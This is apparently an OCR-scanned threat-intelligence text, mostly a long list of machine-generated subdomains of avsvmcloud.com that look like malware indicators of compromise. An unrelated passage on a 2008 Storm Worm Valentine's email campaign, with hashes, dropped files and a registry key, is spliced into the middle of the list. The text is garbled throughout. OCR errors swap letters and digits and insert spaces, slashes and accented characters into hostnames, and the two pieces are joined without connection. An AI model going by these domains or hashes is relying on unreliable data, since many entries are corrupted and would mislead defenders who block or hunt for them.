fq3026m3484isc2jf7a0.appsync-api.us-west-2.avsvmcloud.com 
fq8kijtu4b5inneju6qc.appsync-api.us-west-2.avsvmcloud.com 
fqdalchlun5ninenp8fto4h.appsync-api.us-east-2.avsvmcloud.com 
fr48qllqeqls1l0Ontfgge.appsync-api.us-east-2.avsvmcloud.com 
fu4egknu506e3nhum684.appsync-api.us-east-1.avsvmcloud.com 
fvf90rojjftgo5dtu3022st.appsync-api.us-east-2.avsvmcloud.com 
fvid9kfs8iph7gbt9uf29149711e.appsync-api.us-east-2.avsvmcloud.com 
fynvOhkcb27mg4cu00qua2009jd412b9.appsync-api.us-east-2.avsvmcloud.com 
fvulrv517tanl41tkf8qljo.appsync-api.us-east-2.avsvmcloud.com 
gOaugojfelmo7ro3qv38.appsync-api.us-west-2.avsvmcloud.com 
glgqh760t2v2lc3uhom2v30110ie2h.appsync-api.us-west-2.avsvmcloud.com 
glugvjhh86pm7sbv00q49s20f12ql200.appsync-api.us-west-2.avsvmcloud.com 
g5q077ruegketo3h3vqkhbk.appsync-api.us-east-2.avsvmcloud.com 
g65dcoag5varua2ve2sd026isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
g68mkujrpetovivvO0esqnv21ur29uit.appsync-api.us-east-2.avsvmcloud.com 
g72hhjlrnu3cnaOvoi60tou6iuirObrn.appsync-api.us-east-2.avsvmcloud.com 
g79d0bsp5bergteve2sd0g6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
g7q7273sc58h80mven60eeudoluv2f0t.appsync-api.us-east-2.avsvmcloud.com 
g8a797dktfo8lsfvwh60iun02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
g8lvv1lLho5musgnuovirv6owr0oovi.appsync-api.us-west-2.avsvmcloud.com 
gbasd111jjuled9vwh60oun0ewusouvO.appsync-api.us-east-1.avsvmcloud.com 
gbf016448emeogqiu9uf29149711e.appsync-api.us-east-1.avsvmcloud.com 
gbm3h99kf8nm5vaurjge.appsync-api.us-east-1.avsvmcloud.com 
gce7o/o04ctchtooven60eeudoluv2f0t.appsync-api.us-east-2.avsvmcloud.com 
gck0l44pn2n6e2uuu30e2st.appsync-api.us-east-2.avsvmcloud.com 
gdgtjptl81vqct3f8fmkeod.appsync-api.us-east-1.avsvmcloud.com 
gec3qrvfjmnioco513e0fb5.appsync-api.eu-west-1.avsvmcloud.com 
gefculq076qb2705lo500b1.appsync-api.eu-west-1.avsvmcloud.com 
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gessoqn7lg3np635fmmkbbf.appsync-api.us-east-1.avsvmcloud.com 
gge7m19rtoj8sugvwh60cunOgwusouvO.appsync-api.us-west-2.avsvmcloud.com 
ggjq9c8j8nb8ut0voi60gouG6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
ggm0p8dn9ab55fsuulLhO2csuvnOgnj.appsync-api.us-west-2.avsvmcloud.com 
ggokp42htrcg7m8uos2v52sh02e2h.appsync-api.us-west-2.avsvmcloud.com 
ggos6p46s9estsoueuheoip0b12eul.appsync-api.us-west-2.avsvmcloud.com 
gh9kd9ee4v5gg8o3irci.appsync-api.us-east-1l.avsvmcloud.com 
gjaggu9tp478kbnv002u914p5554q6ro.appsync-api.us-west-2.avsvmcloud.com 
gjq7qldlti686uhvwh60tunOewusouvO.appsync-api.us-west-2.avsvmcloud.com 
gk94ggmtvj3600fejfj5.appsync-api.us-east-2.avsvmcloud.com 
gka6nq333gbpse3e7i65.appsync-api.us-east-2.avsvmcloud.com 
gl63mjuecaqvsv6v00eu4sihv504tori.appsync-api.us-east-2.avsvmcloud.com 
gluhe6ldnt8cutOvoi6OtouGiuirObrn.appsync-api.us-east-2.avsvmcloud.com 
gm2ncqslo38ub9ju6d6n0c6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
gm9ipuO0pskfrdolvuhsO2e2sd0bovirl.appsync-api.us-east-1.avsvmcloud.com 
gmk94bmO0ejprjppvOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
gmovu3cjdvookn9vwouhOlovwrvorvi0.appsync-api.us-east-1.avsvmcloud.com 
gmpla9g4rlfkmlhvuhsOce2sd02ovirl.appsync-api.us-east-1l.avsvmcloud.com 
gmqs4715j821hphvwh60gunOtwusouvO.appsync-api.us-east-1.avsvmcloud.com 
gmtqli7f51tph90utvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
gn1lb4tmo0jd4kaoe1f95.appsync-api.us-west-2.avsvmcloud.com 
gnfm22Idl9ainmifOrbOpor.appsync-api.us-east-2.avsvmcloud.com 
go4ek1loktvrli8rue2q0012eul.appsync-api.eu-west-1.avsvmcloud.com 
gp27ssesmvnpkgff7rcOeok.appsync-api.us-east-1.avsvmcloud.com 
gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com 
gr5ioskgsa7rbbpvuhsOce2sdOoovirl.appsync-api.us-east-1.avsvmcloud.com 
gr6nnbvdqn1lkf48ve6vidodsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
gs5vjvvp3absjOfldoikroh.appsync-api.us-east-2.avsvmcloud.com 
gs/7fbud8ap2bic3timhi.appsync-api.us-west-2.avsvmcloud.com 
gs9cuvo0tmp7sholvo30i05.appsync-api.us-east-2.avsvmcloud.com 
gt6b41bovgdulao81f2a.appsync-api.us-west-2.avsvmcloud.com 
gul0bvbbcvd8bg3ta063.appsync-api.us-west-2.avsvmcloud.com 
gv2iol4m22mvjv7uco0ge2sd.appsync-api.us-east-1.avsvmcloud.com 
gvagkill58apf9lutvef0il2eu1.appsync-api.us-east-1.avsvmcloud.com 
h348mmjvjapa5pfvurso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
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4.1.9 Storm Worm’s St. Valentine Campaign (2008-01-16 02:11) 


The [1]Riders on the Storm Worm started riding on yet another short term window of opportu- 
nity as always - St. Valentine’s day with a mass mailing email campaign linking to two files 
with love.exe and withlove.exe, using an already infected host as a propagation vector itself 
in the very same fashion they’ve been doing so far. 


Detection rate : 3/32 (9.38 %) 

File size: 114689 bytes 

MD5: 31ac9582674cad4c8c8068efb173d7c7 

SHA1: cee93d3021318a34e188b8fae812aa929cb2bc9c 


NOD32v2 - a variant of Win32/Nuwar 
Prevx1 - Stormy:All Strains-All Variants 
Webwasher-Gateway - Win32.Malware.gen!88 (suspicious) 


The binary drops burito.ini (MD5 - A65FA0C23B1078B0758B80B5COFD37F3) and burito1205- 
67d5.sys (MD5 - C4B9DD12714666C0707F5A6E39156C11), and creates the following registry 
entries : 


HKEY _~LOCAL _MACHINE\SYSTEM\ControlSet001\Enu m\Root\LEGACY —BURITO1205-67D5 
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h3bs1h984phgo6hwwh60eunO0ewusouvO.appsync-api.us-west-2.avsvmcloud.com 
h3j990q29eae2u9veb6u0i12eul.appsync-api.us-west-2.avsvmcloud.com 
h3k3hai001lvvgl7wwh602un02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
h3mkn3ntnk3iii7wunOyOyzOthijOc12.appsync-api.us-west-2.avsvmcloud.com 
h3mpe296rhlu7pfwds2nO0i3uholi2vOi.appsync-api.us-west-2.avsvmcloud.com 
h3nukdm78I85m3bwunhovOieullonf6e.appsync-api.us-west-2.avsvmcloud.com 
h49bjOtbhvcdsmdu5c89.appsync-api.us-west-2.avsvmcloud.com 
h4lOlbh8bjqpl8qgt8le3p1.appsync-api.us-east-2.avsvmcloud.com 
h5sqsh3ldnu7959p07ge4dr.appsync-api.us-east-1.avsvmcloud.com 
h6p5j45piipsq3vvtvefOt12eul.appsync-api.us-east-1.avsvmcloud.com 
h6qtppelj3tjlokwOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
h7ttod2djiqjsofwOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
h7vc3vcgj9s7aumwOO0iesdbOvfhedl45.appsync-api.us-east-1.avsvmcloud.com 
ha26soiefmoh8gqndj7eodf.appsync-api.us-east-1.avsvmcloud.com 
hbOlLujbtkgpcqgivp2sji2vOee25p.appsync-api.us-east-2.avsvmcloud.com 
hd010rekkecceg4iu71lepp0O.appsync-api.us-west-2.avsvmcloud.com 
he2qr7p28cvsjcdnr80ebd7.appsync-api.us-west-2.avsvmcloud.com 
he9kiquunv5d8ngjujl1.appsync-api.us-west-2.avsvmcloud.com 
heeil8m3ubrkji9n18d20d5.appsync-api.us-west-2.avsvmcloud.com 
heh7s81pnli89u9nNkc22bdv.appsync-api.us-east-2.avsvmcloud.com 
hehgigetn3tdt1qjpj 70.appsync-api.us-west-2.avsvmcloud.com 
hfe34nk4htdhc6tw00g49irp95gu9nfm.appsync-api.us-west-2.avsvmcloud.com 
hgrd8jat6rno7h2ve.appsync-api.eu-west-1.avsvmcloud.com 
hh5q8k19jb4sk3qpegk2hdn.appsync-api.us-west-2.avsvmcloud.com 
hi35qtulot6kj5qvhom2v30110ie2h.appsync-api.us-west-2.avsvmcloud.com 
hibqpejOubv3t8gwelovoeu6orssuwo6.appsync-api.us-west-2.avsvmcloud.com 
hifpjoocmOppal6veuheoip0b12eul.appsync-api.us-west-2.avsvmcloud.com 
hjlccqesdulojdowO00hu0imrfggqtkbm.appsync-api.eu-west-1.avsvmcloud.com 
hl045f89tgrdp3tv6d6n0g6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
hl5ttenpk6mi8vrvcussor0ceu.appsync-api.us-east-1.avsvmcloud.com 
hlc3g293751la3nivOool.appsync-api.us-east-1.avsvmcloud.com 
hlfobsupm8c59e2vuj0esf.appsync-api.us-east-1.avsvmcloud.com 
hlgrfnhmqc8qevcv6e0odohu0ot2w.appsync-api.us-east-1.avsvmcloud.com 
hli7vmi9nfal7q4wO0090gdearf95t2qh.appsync-api.us-east-1.avsvmcloud.com 


hlosr7obo8ml8uvvsodiu0oe2h.appsync-api.us-east-1.avsvmcloud.com 
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hm4tpjrveeO033stw6260lunOi6iuirOi.appsync-api.us-east-2.avsvmcloud.com 
hmp9sjf8n4d6pq5v5u0ilel.appsync-api.us-east-2.avsvmcloud.com 
hmpe5011r9pvb93wovi021fj201030vi.appsync-api.us-east-2.avsvmcloud.com 
hmq2rp92qtfss85wO00h4dkr20fgaaobd.appsync-api.us-east-2.avsvmcloud.com 
hnv13b0bkmtk2t92p7mg.appsync-api.us-east-1.avsvmcloud.com 
hpeu9vfOulkgqf9dieg52dpd.appsync-api.us-west-2.avsvmcloud.com 
hq5hpuukv8bm164j36ei.appsync-api.us-west-2.avsvmcloud.com 
hranipdbjh6tmf8vvwonou0ie2h.appsync-api.us-east-2.avsvmcloud.com 
hrcl3vpcubjkiinwoi60couG6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
hreeui31f5qivrmvu30e2st.appsync-api.us-east-2.avsvmcloud.com 
hudguqnuni2ear9g16u2rpf.appsync-api.us-east-1.avsvmcloud.com 
huf78qpm3rivshdgtjkempf.appsync-api.eu-west-1.avsvmcloud.com 
hv4u5djhi6pjlL8we2sdOt6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
iOevaoeklvv20kippvkn44k.appsync-api.us-west-2.avsvmcloud.com 
iOhpm6éd7rq5dfO3pO0fpn44i.appsync-api.us-east-2.avsvmcloud.com 
i0j5179mrdacj83pdv6n24g.appsync-api.us-west-2.avsvmcloud.com 
iOrOnmuvoo2jt5oolfll.appsync-api.us-east-2.avsvmcloud.com 
ilcafiourSu5bniwe6u0il2eul.appsync-api.us-west-2.avsvmcloud.com 
ilefeva7t99972nwurso2ve2sd0be2h.appsync-api.us-west-2.avsvmcloud.com 
i407Imdh3osa5jfgr3rpr2v.appsync-api.us-east-1.avsvmcloud.com 
i514gciduobjvlfolr3h.appsync-api.us-east-2.avsvmcloud.com 
i575nuhlhds0573pavi59qi.appsync-api.us-east-2.avsvmcloud.com 
i1645604fpe2jhb4wu30b2st.appsync-api.us-east-2.avsvmcloud.com 
i6tpc2alhvOiucjxe2sdO0o6isuif6évri.appsync-api.us-east-2.avsvmcloud.com 
i71nka0t0O74Icp1xoi6O0eouGiuirOern.appsync-api.us-east-2.avsvmcloud.com 
i7vv7q8lvooaeqow6e050be2h.appsync-api.us-east-2.avsvmcloud.com 
i86iegbrro6dh53wuehrneisO2un.appsync-api.us-west-2.avsvmcloud.com 
i8buqpf6957p12hxds2n0i3uholi2vO0i.appsync-api.us-west-2.avsvmcloud.com 
ia58r2fttutb913jhbvj.appsync-api.us-west-2.avsvmcloud.com 
iadl2ajknhjcgtfjbosd.appsync-api.us-east-2.avsvmcloud.com 
iaegmgmtr4pd7qfidmn3.appsync-api.us-west-2.avsvmcloud.com 
ib9Icm2gmfh54csxoi60tou6iuirOgrn.appsync-api.us-east-1l.avsvmcloud.com 
ibgkg4r0aucnhb2xe6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
ipbnk73sOjofsrfsw6d6n0g6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
icocfcrfig6cpog2xwol11rOoirssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
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icdqui828khflqcwenu02e2sd.appsync-api.us-east-2.avsvmcloud.com 
icok5rOmvd4uh8awjed10ge2h.appsync-api.us-east-2.avsvmcloud.com 
idchijm6kdlf6nii2fOnp2p.appsync-api.us-east-1.avsvmcloud.com 
ieqglkejo6oh10indmgnf4h.appsync-api.us-east-1.avsvmcloud.com 
igoee56leec46t8whom2v301102e2h.appsync-api.us-west-2.avsvmcloud.com 
igoee56leec46tcwhom2v30110ge2h.appsync-api.us-west-2.avsvmcloud.com 
invpgv9psvq02ffo7 7et.appsync-api.us-east-2.avsvmcloud.com 
ikd40q0ii6b0670i4rj5p2g.appsync-api.us-west-2.avsvmcloud.com 
ikqsolktgfleolfi2rf5p2r.appsync-api.us-west-2.avsvmcloud.com 
iiOagldelLO5rbhnw5u0ilel.appsync-api.us-east-2.avsvmcloud.com 
im55nuau5ptq6inwjed10ee2h.appsync-api.us-east-1.avsvmcloud.com 
inrlockq9drvrd3itv89dep.appsync-api.us-east-2.avsvmcloud.com 
iolv9ddpo72r4t6xee6efssoeflfhOte.appsync-api.eu-west-1.avsvmcloud.com 
ip007efrui75clii2v08d2i.appsync-api.us-east-1l.avsvmcloud.com 
iqrd8m742sqnt23nvonnb49.appsync-api.us-east-1.avsvmcloud.com 
ir6Llpf3khg9murxhv30gst011luqO0oue.appsync-api.us-east-1.avsvmcloud.com 
ir7longjn92pm8qxeoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
ir9esdinhj9d3fdwtvef0il2eul.appsync-api.us-east-1.avsvmcloud.com 
irdu1l32ub0quelxe2sd026iovtsupno.appsync-api.us-east-1.avsvmcloud.com 
irklg607gO0ileqSwe2q0i12eul.appsync-api.us-east-1.avsvmcloud.com 
irnrin4d4due7fgh9wco0ge2sd.appsync-api.us-east-1.avsvmcloud.com 
itf7e68egjmh8ronuo55b4n.appsync-api.us-west-2.avsvmcloud.com 
ivdkamavjf7s4vcw6d6n0c6j0ieu.appsync-api.us-east-1.avsvmcloud.com 
ivhubOgpold7fiixwh60gun0twusouv0.appsync-api.us-east-1.avsvmcloud.com 
ivkg3dh4ghpj52mwfveoip0enj.appsync-api.us-east-1l.avsvmcloud.com 
jO2fb20r03179mgheit72mp.appsync-api.us-east-2.avsvmcloud.com 
jO51q2hft2mbhvj3dvv2.appsync-api.us-west-2.avsvmcloud.com 
jO5auhjm3s4hdr138rmm.appsync-api.us-west-2.avsvmcloud.com 
jO6I9g2pmi7jghj3kr2c.appsync-api.us-west-2.avsvmcloud.com 
jOrsppludb693d83siom.appsync-api.us-east-2.avsvmcloud.com 
j2pk60f7glLmmbk81gmclr30.appsync-api.us-east-1.avsvmcloud.com 
j32gc44lim8jbdbx6d6n0c6j0ieu.appsync-api.us-east-1.avsvmcloud.com 
j39qr5fhk9kkslcxtvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
j4pnl4m823on6tj1b0a7i30.appsync-api.us-east-1.avsvmcloud.com 


j5Lm9tvpO0ul4dej37i9g.appsync-api.us-west-2.avsvmcloud.com 
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j570sc7qbjpoceg3crai.appsync-api.us-east-2.avsvmcloud.com 
j5uqlssr1hfqnn8hkf172mp.appsync-api.us-west-2.avsvmcloud.com 
j5vautirmsvcpbjhgie72mg.appsync-api.us-west-2.avsvmcloud.com 
j673t7242re0i89xvg0all49711e.appsync-api.us-west-2.avsvmcloud.com 
j777r2f04t42bsnyOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
j8cctvevmnkrbl7yun022dioho7r1p0e.appsync-api.us-east-2.avsvmcloud.com 
j8k7lqspu4nseeuxu30i2st.appsync-api.us-east-2.avsvmcloud.com 
j8uv3pr6rqlg8kpyq535zO0i3rq1rii0o.appsync-api.us-east-2.avsvmcloud.com 
ja6pvgs5mrjjgo88bb28.appsync-api.us-west-2.avsvmcloud.com 
jabkjg2|IObfekb881bps.appsync-api.us-west-2.avsvmcloud.com 
jod3d1luqjashtqx6ne30g12eul.appsync-api.eu-west-1.avsvmcloud.com 
jc18hh8e6ak7411xe6u0e12eul.appsync-api.us-west-2.avsvmcloud.com 
jcl18hh8e6ak7419xe6u0012eul1.appsync-api.us-west-2.avsvmcloud.com 
jcfdalfpkvrdhi4xe2mvri0te2m0be2h.appsync-api.us-west-2.avsvmcloud.com 
jchk1s75v9a5ef8ywh6Otun0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
jchk1s75v9a5efcywh60tun0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
jci7gmknal15jb2Ixdfclo6rsOooi.appsync-api.us-west-2.avsvmcloud.com 
jcluv3eoqtqrresx2eul.appsync-api.us-west-2.avsvmcloud.com 
jcvi7o1j7k24b0hywh60tunOgwusouv0.appsync-api.us-west-2.avsvmcloud.com 
jd74lascikijc71f2iald3i.appsync-api.us-east-1.avsvmcloud.com 
je8m9vhbm4|8uv885bpa.appsync-api.us-east-1.avsvmcloud.com 
jf4ga4qrivcj4dmx6d6n0g6j02eu.appsync-api.us-east-1l.avsvmcloud.com 
jftnO2th7ba7ru3yoi6O0touG6iuirOorn.appsync-api.us-east-1.avsvmcloud.com 
jgOra34it3tdjsmye2sd026isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
jg3lsj9jqgkn7vlyoi602o0uG6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
jga/7cjdpauatposyovi0t1fj2010kovi.appsync-api.us-east-2.avsvmcloud.com 
jgfatv4l3s3I8mqximO0c2st.appsync-api.us-east-2.avsvmcloud.com 
jgrasd504n1q0oiyq22nsf55096uqprs.appsync-api.us-east-2.avsvmcloud.com 
jhq70ih8gaduf9g30v6c.appsync-api.us-east-1.avsvmcloud.com 
ji5j6L3mptutl8kx91lhqa6omgu8eap.appsync-api.us-east-1.avsvmcloud.com 
jispoadgkt7dbmgyuhsOce2sd0govirl.appsync-api.us-east-1.avsvmcloud.com 
jicnbla82hprmu3yeoip256uesuhrvi2.appsync-api.us-east-1l.avsvmcloud.com 
jisgO2qdirmjdp3x6d6n0e6jO0ieu.appsync-api.us-east-1.avsvmcloud.com 
jjg2q47bfg7ode0yoi60tou6iuirOorn.appsync-api.us-east-2.avsvmcloud.com 
jjg2q47bfg7odelyoi60tou6iuirOorn.appsync-api.us-east-2.avsvmcloud.com 
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jjklom1314jink7x91.appsync-api.us-east-2.avsvmcloud.com 
jkea6nm20q2hev1fqrt7p3k.appsync-api.us-west-2.avsvmcloud.com 
jkh444cotcdbasje8v7e.appsync-api.us-west-2.avsvmcloud.com 
jl59hpqkhpafcmdxurso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
jljm963j1lkbtuu0yoi6O0couGiuirO0irn.appsync-api.us-west-2.avsvmcloud.com 
jmmhvgdof9im2mixc2d02e2h0tdj.appsync-api.eu-west-1.avsvmcloud.com 
jn4j9vohficucfje9ij1.appsync-api.us-west-2.avsvmcloud.com 
jn520ts2pvf3tv8f9eclp3p.appsync-api.us-west-2.avsvmcloud.com 
jneO6tbcbnanp3jf6éfold3p.appsync-api.us-west-2.avsvmcloud.com 
jnj453jbfkO03v38edign.appsync-api.us-west-2.avsvmcloud.com 
jojggmlk9s7Ihquye6vi0bdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
jpo5mhOm0kp2cclfirrcp3n.appsync-api.us-east-1.avsvmcloud.com 
jsiabk1jcah64k8ttmkr.appsync-api.us-west-2.avsvmcloud.com 
jso6265k2hn6leg1208Ir37.appsync-api.us-east-2.avsvmcloud.com 
jtanr3uthrt21g88203t.appsync-api.us-west-2.avsvmcloud.com 
jtd97jis70cbfjg5fov7bmn.appsync-api.us-east-2.avsvmcloud.com 
jtmeu6cslgk39pg89mf0.appsync-api.us-east-2.avsvmcloud.com 
ju7uvtj50184li8tqohv.appsync-api.us-west-2.avsvmcloud.com 
jucvinlbiog47n1tIlmhp.appsync-api.us-east-2.avsvmcloud.com 
jumtbcg890e2bI8te3tp.appsync-api.us-west-2.avsvmcloud.com 
k24gv989bd34o0lv5u32a.appsync-api.eu-west-1.avsvmcloud.com 
k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com 
k79jr5ikqcpumklzoi6OcouG6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
k7eb5975hja9eatyO2ueO0i0l.appsync-api.us-east-2.avsvmcloud.com 
k7juuhg3btk63b9yf2videe2h.appsync-api.us-east-2.avsvmcloud.com 
k8944jv715skgg1zds2n0o3uho1li2vOc.appsync-api.us-west-2.avsvmcloud.com 
kb0o02bs7bbnbkaayov6érun0g2st.appsync-api.us-east-1.avsvmcloud.com 
kb597umaunsal2tyw6d0ee2h.appsync-api.us-east-1.avsvmcloud.com 
kb8pl5us4022vtsy6d6n0g6j02eu.appsync-api.us-east-1.avsvmcloud.com 
kbtld5semsi8gbjz00iesdbOvfhe0l45.appsync-api.us-east-1l.avsvmcloud.com 
kcsqu6amhk7kmm1zunOc2dioho7r1lp0c.appsync-api.us-east-2.avsvmcloud.com 
kd6590n43hks8rvhOfj2.appsync-api.us-east-1.avsvmcloud.com 
kebbjOlrh7scsnrtampd3ll.appsync-api.us-east-1.avsvmcloud.com 
kgovb3hbcot3apizwh602un02wusouv0.appsync-api.us-west-2.avsvmcloud.com 


kj 7f5mjcpbrm9ptyh.appsync-api.us-west-2.avsvmcloud.com 
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kjdcdqmq23g33m6z00mudofi7/5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
kl2daf5gfl7il60z0i60bou6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
km2i9b2hr47kd9uzeoip256uesuhrvi2.appsync-api.us-east-1l.avsvmcloud.com 
km4mld3hb340b9ky00isdorp9ujh9bi.appsync-api.us-east-1.avsvmcloud.com 
km6il54ttij99h2z0i60tou6iuirOorn.appsync-api.us-east-1.avsvmcloud.com 
knbptt7104faeorhiric.appsync-api.us-east-2.avsvmcloud.com 
knn04h50149shkbhufrj.appsync-api.us-west-2.avsvmcloud.com 
knr4ks00b647cvbh2iu5.appsync-api.us-west-2.avsvmcloud.com 
kq9bvelvpsenurrluoq2.appsync-api.us-east-1.avsvmcloud.com 
krOugestl213degzvo0ee2sd0bvuiov6.appsync-api.us-east-1.avsvmcloud.com 
krcildb6d0ev277ye2q0b12eul.appsync-api.us-east-1.avsvmcloud.com 
krpr3dl0i3479vdyqro2550er0ee2h.appsync-api.us-east-1.avsvmcloud.com 
ksao3d0i4s5kkbv8qod9vg5.appsync-api.us-east-2.avsvmcloud.com 
ktmcvl80q0g8ijvtlbg9mlv.appsync-api.us-east-2.avsvmcloud.com 
kugs4h74vq92n5v8goidvth.appsync-api.us-west-2.avsvmcloud.com 
kv6a0jg8786niapytvef0il2eul.appsync-api.us-east-1.avsvmcloud.com 
kvigfpnujsdlvgpzuhsOoe2sdO0oovirl.appsync-api.us-east-1.avsvmcloud.com 
kvo4mmles1imfiuizwh60cun0gwusouv0O.appsync-api.us-east-1.avsvmcloud.com 
kvqlb0a8m0I8u0ez00iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
lOej9b3he8coafof9rcl.appsync-api.us-west-2.avsvmcloud.com 
lOk79ppp8p76fhofkris.appsync-api.us-west-2.avsvmcloud.com 
l1fv20a6q9mhljpzurso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
I2dkplid39dfhn38j300vjl.appsync-api.eu-west-1.avsvmcloud.com 
I207a4fk7sa73u355bnl.appsync-api.us-east-1.avsvmcloud.com 
I57fo09h36tg6k3faqfil.appsync-api.us-west-2.avsvmcloud.com 
I5Sm4n8bdcél8niofnfhg.appsync-api.us-west-2.avsvmcloud.com 
l6qkc3kih6ggklkOoi60cou6iuirOorn.appsync-api.us-east-2.avsvmcloud.com 
1743 rbuf8scv0161v52296bbfg5qal49.appsync-api.us-east-2.avsvmcloud.com 
I7ihnn112h60bplOzO00isdorp9ujh9bi.appsync-api.us-east-2.avsvmcloud.com 
I7vdk6s20b3rle80e2sd026isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
I80m4h3moof8ffob0O00Omudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
I89ru8n7tqlm6ngzsuo0ce2h.appsync-api.us-west-2.avsvmcloud.com 
la3qv67nqago4231cbao.appsync-api.us-west-2.avsvmcloud.com 
la4mOsctf5f3anilo3ij.appsync-api.us-east-2.avsvmcloud.com 
labcvlinm51jobh310buj.appsync-api.us-west-2.avsvmcloud.com 
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lalmqnricnr6rqol17vpj.appsync-api.us-west-2.avsvmcloud.com 
lamcf3a7g5hisiftvmhkm69.appsync-api.us-west-2.avsvmcloud.com 
lbufdtueqsf3grb000iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
le48qrcg7mlOs6itkmbk36v.appsync-api.us-east-1.avsvmcloud.com 
le6itc9pbIh3k2311bh5.appsync-api.us-east-1.avsvmcloud.com 
leajiq7s79krdeitlvb0m67.appsync-api.us-east-1.avsvmcloud.com 
If8aqc64b7skp2azv6q3ruli30cvri.appsync-api.eu-west-1.avsvmcloud.com 
Iglvp5asqdch66nzurso2ve2sd0ee2h.appsync-api.us-west-2.avsvmcloud.com 
Ig9Omalcps6ovek000mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
Ig9tokolgniOvrize6u0b12eul.appsync-api.us-west-2.avsvmcloud.com 
Igsrianmc13k2ggztlf0ee2h.appsync-api.us-west-2.avsvmcloud.com 
Ihdjpf749dng4efelm70q6r.appsync-api.us-east-1.avsvmcloud.com 
liL8fvb2rse3keizv6q3ruli30bvri.appsync-api.eu-west-1.avsvmcloud.com 
Ijhogagmpkjo9e7000mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
Ijsqrmjicu288eg0oi60oou6iuir0irn.appsync-api.us-west-2.avsvmcloud.com 
Ikilqkhfcem62vohdvk4.appsync-api.us-west-2.avsvmcloud.com 
lWi0Qauqjkhr6istzu30i2st.appsync-api.us-east-2.avsvmcloud.com 
Ijh2bl4kttcte90o0i60touGiuirObrn.appsync-api.us-east-2.avsvmcloud.com 
lIimcpepfomfo20zp2sji2v00e25p.appsync-api.us-east-2.avsvmcloud.com 
lIimcpepfomfo21zp2sji2v02e25p.appsync-api.us-east-2.avsvmcloud.com 
Im173piejlhput3zscr0t6éjOeeu.appsync-api.us-east-1.avsvmcloud.com 
Inh9c743tq7a80f3frmk9jd.appsync-api.us-east-2.avsvmcloud.com 
Inivqg09i7ers2qohlifko.appsync-api.us-west-2.avsvmcloud.com 
lo9jctj7Iggmbbvzovi02veu360tvri.appsync-api.eu-west-1.avsvmcloud.com 
lobeOfosavdlf3lze2q0o012eul.appsync-api.eu-west-1.avsvmcloud.com 
Ir1li34kjua0rm6pOuhsOce2sdO0oovirl.appsync-api.us-east-1.avsvmcloud.com 
Ir3gsae383m0mqeOoi60bou6iuirOorn.appsync-api.us-east-1.avsvmcloud.com 
IrmqalltOjmpo5lztvef0t12eul.appsync-api.us-east-1.avsvmcloud.com 
Irsfrtttqkv3nr8000iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 
IsOva7msea08l908tb60fjf.appsync-api.us-west-2.avsvmcloud.com 
Isnqmp7g8si69435cmrb.appsync-api.us-west-2.avsvmcloud.com 
It5ai41lqh5d53qoti3mkmc0.appsync-api.us-west-2.avsvmcloud.com 
Itpo9v90n1lqgse2316ols.appsync-api.us-west-2.avsvmcloud.com 
lu8f6rmcerallvo85o0g0fjv.appsync-api.us-west-2.avsvmcloud.com 
lu9u5r3tlcuevno5a3ia.appsync-api.us-west-2.avsvmcloud.com 
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lugqm57g/7sisd435c3dp.appsync-api.us-west-2.avsvmcloud.com 
lv8uil0k2kg435h000mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
IviiOcm16kbquhp05i6011udue3reu60.appsync-api.us-east-1.avsvmcloud.com 
m1lg6fti08vv0s1le2sd0i6iovtsupno.appsync-api.us-east-1.avsvmcloud.com 
mipcq3emvagsjm60t650cee.appsync-api.us-east-1.avsvmcloud.com 
m38bgil8f5jo7ad06qn0g12eul.appsync-api.us-east-2.avsvmcloud.com 
m3e2rdqmv09d21f0v5.appsync-api.us-east-2.avsvmcloud.com 
m3rmre9cqd957bd10i6020u6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
m473our8sn2rrctnfchl.appsync-api.us-west-2.avsvmcloud.com 
m4k82nbqofqifg5jo6d8fg5.appsync-api.us-west-2.avsvmcloud.com 
m591b6j72fu85 7uiig3i.appsync-api.eu-west-1.avsvmcloud.com 
m69dja7eprpf5p20f6nI9l0g2st.appsync-api.eu-west-1.avsvmcloud.com 
m81f15904v1bdl90tvef0tl2eul.appsync-api.us-east-1.avsvmcloud.com 
m87sgjjuill8hojloi6Ocou6iuirOcrn.appsync-api.us-east-1.avsvmcloud.com 
